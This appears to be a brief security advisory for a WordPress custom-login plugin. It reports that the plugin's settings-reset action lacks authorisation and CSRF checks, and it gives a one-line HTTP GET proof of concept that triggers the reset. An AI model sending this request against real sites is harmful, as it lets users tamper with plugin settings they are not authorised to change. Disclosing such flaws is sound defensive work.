The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check when reseting plugin settings, which could allow authenticated users to reset them.

Proof of Concept

GET /wp-admin/admin.php?page=wip_custom_login_panel&tab=Import_Export&action=wip_custom_login_backup_reset HTTP/1.1
Host: localhost